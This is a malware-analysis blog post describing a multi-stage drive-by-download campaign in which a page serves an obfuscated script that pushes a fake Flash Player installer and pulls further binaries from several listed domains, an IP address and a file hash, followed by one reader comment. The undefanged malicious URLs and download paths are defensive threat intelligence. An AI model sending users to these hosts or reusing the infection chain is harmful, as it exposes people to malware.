In this sense, the Internet has become the cradle that rocked different parts alternatives through alternative malicious attack that evolves daily. Several years ago it was quite difficult to assume that by merely accessing a page is a danger of infection if certain requirements are met the system requirements that have to do primarily with operating system updates and applications.
Today, we find script's whose instructions are made maliciously and are part of a cycle of spread and infection, unfortunately, very effective. A concrete example of not only evolution but also of effectiveness, it's the art Drive-by-Download with his attacks evolved version of Multi-Stage, highly used by botmasters to propagate threats.
The following is an actual scenario that more clearly exemplifies what I have. This is a site hosted in EEUU under the IP 66.116.197.186 in AS32392. Below shows a screenshot of the website.
The domains hosted on that IP are:
- phonester.biz
- phonester.com
- phonester.info
- phonester.net
- phonester.org
This automatic processing is carried out, as I said, through a script, whose capture is seen below. The issue with this is probably that when the user doesn't carry any indication of malicious content, in fact, the page contains no links, only an image.
However, in a transparent way the script is run that prompts to download the fake Flash Player. Now ... the issue doesn't end here. From a more technical standpoint, there are many details that aren't difficult to grasp.
In principle, desofuscar the script, get a series of relevant data. The script has iframe tags that address a range of websites from where you download other malicious files.
- diggstatistics.com/flash/pdf.php
- diggstatistics.com/flash/directshow.php
- diggstatistics.com/flash/exe.php
Moreover, in the unlikely event that the file is downloaded in the first instance (install_flash_player.exe) is executed, the connection set against 174.120.61.126/~ garynic/ from where you downloaded the binary "coin.exe" (258c0083f051b88ea36d3210eca18dd7) with a detection rate also quite poor. This file is downloaded at random from:
- digital-plr.com
- giggstatistics.com
- xebrasearch.com
That is, these activities are operated together, not in isolation. This information doesn't assume that the pattern behind all these criminal activities is hiding some botmaster greed, since the actions are typical of a botnet.
Related information
Propagación de Malware (...) con formato de blogging y BlackHat SEO
Simbiosis del malware actual. Koobface
Scareware. Repositorio de malware In-the-Wild
Masiva propagación de malware (...) sitios de entretenimiento
Análisis esquemático de un ataque de malware basado en web
Jorge Mieres
1 comment:
As always - highly informative. Thank you for fighting the good fight.
Cheers
/Bev
Post a Comment